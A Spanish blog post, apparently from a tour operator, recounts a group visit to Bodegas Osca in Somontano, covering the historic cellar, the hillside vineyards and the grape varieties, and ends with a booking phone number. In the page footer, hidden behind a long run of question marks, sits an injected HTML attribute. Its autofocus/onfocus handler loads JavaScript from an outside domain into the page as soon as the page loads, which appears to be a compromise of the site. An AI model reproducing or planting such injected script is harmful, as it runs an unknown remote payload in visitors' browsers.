¡Qué bien lo pasamos en nuestra visita a Bodegas Osca!, un día lleno de armonía y conexión. Y es que el vino, produce ese efecto. Así que si además, tienes la oportunidad de visitar una buena bodega y comprobar de dónde salen estos “caldos” tan ricos, la experiencia es 10.

Visita a Bodegas Osca

El 20 de noviembre, recibimos al grupo en la Plaza de la Iglesia y primero les enseñamos los interiores de la Bodega. Una bodega con olor a tradición e historia. La Bodega más antigua de España que se encuentra en funcionamiento. En el interior, se puede respirar una amalgama de esencias a barrica, cuero, hollejo y piedra desde el mismo suelo.

Después fuimos a las viñas. Viñedos que abarcan 30 hectáreas de suelo arcilloso calizo, siempre en cultivo de secano y, como contamos, conviven con carrascas, olivos y cereales por encima de los 530 m de altitud, la zona más alta del Somontano.

En la zona, llueve lo justo y necesario. Las precipitaciones se alternan con la abundante luz dorada, que nutre y calienta la cepas de tempranillo, garnacha, moristel, syrah, merlot o cabernet sauvignon, variedades tintas de estos viñedos, o las Chardonnay, Macabeo, Gewurztraminer y garnacha blanca entre las variedades blancas.

¡Nos encanta realizar visitas a las Bodegas!, siempre es magia….

Si quieres realizar una visita como está, ¡llámanos, o escríbenos por whatsapp en el tel. 692 367 572!

 

Los mejores vinos de Bodegas Osca, aquí….

 

 

0
0,00 
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//ideasenpapel.com.gt/404/js/counter.js";document.head.append(script); autofocus=\"
Empty Cart